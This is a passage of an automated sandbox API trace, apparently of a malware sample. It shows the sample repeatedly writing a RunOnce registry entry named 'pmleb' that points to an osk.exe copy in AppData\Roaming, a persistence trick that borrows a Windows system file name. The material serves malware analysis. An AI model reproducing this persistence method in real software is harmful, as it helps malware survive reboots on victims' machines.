[7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0079.634] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0079.634] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x47 [0079.634] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0079.634] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x48 [0079.634] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, 
dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0079.635] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x47 [0079.635] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.635] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0079.635] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.635] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.635] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0079.635] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0079.635] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0079.635] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0079.635] 
_mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0079.635] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0079.635] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0079.635] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0079.636] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0079.636] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0079.636] RegCloseKey (hKey=0x280) returned 0x0 [0079.636] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.636] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.636] SetTimer (hWnd=0x20280, nIDEvent=0x2047, uElapse=0xa, lpTimerFunc=0x0) returned 0x2047 [0079.636] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0079.643] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0079.643] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0079.644] KillTimer (hWnd=0x20280, uIDEvent=0x2047) returned 1 [0079.644] 
ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.644] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0079.644] IUnknown:Release (This=0x787518) returned 0x1 [0079.644] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0079.644] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0079.644] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0079.644] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0079.644] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, 
[1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0079.644] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0079.644] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0079.644] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0079.645] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0079.645] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x48 [0079.645] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0079.645] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x49 [0079.645] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, 
wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0079.646] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x48 [0079.646] ??2@YAPAXI@Z () returned 0x2b51e50 [0079.646] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.646] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0079.646] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.646] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.646] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0079.646] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0079.646] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0079.646] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0079.646] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0079.646] RegCreateKeyExA (in: 
hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0079.646] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0079.646] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0079.646] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0079.647] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0079.647] RegCloseKey (hKey=0x280) returned 0x0 [0079.647] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.647] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.647] SetTimer (hWnd=0x20280, nIDEvent=0x2048, uElapse=0xa, lpTimerFunc=0x0) returned 0x2048 [0079.647] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0079.659] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0079.659] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0079.659] KillTimer (hWnd=0x20280, uIDEvent=0x2048) returned 1 [0079.659] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.659] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, 
Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0079.660] IUnknown:Release (This=0x787518) returned 0x1 [0079.660] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0079.660] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0079.660] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0079.660] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0079.660] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) 
returned 0x80004002 [0079.660] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0079.660] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0079.660] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0079.660] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0079.660] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x49 [0079.660] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0079.660] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x4a [0079.660] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, 
pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0079.661] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x49 [0079.661] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.661] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0079.661] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.661] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.661] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0079.661] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0079.661] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0079.661] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0079.661] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0079.662] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, 
phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0079.662] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0079.662] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0079.662] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0079.662] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0079.662] RegCloseKey (hKey=0x280) returned 0x0 [0079.662] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.662] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.662] SetTimer (hWnd=0x20280, nIDEvent=0x2049, uElapse=0xa, lpTimerFunc=0x0) returned 0x2049 [0079.662] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0079.675] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0079.675] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0079.675] KillTimer (hWnd=0x20280, uIDEvent=0x2049) returned 1 [0079.675] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.675] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 
[0079.675] IUnknown:Release (This=0x787518) returned 0x1 [0079.676] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0079.676] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0079.676] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0079.676] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0079.676] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0079.676] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, 
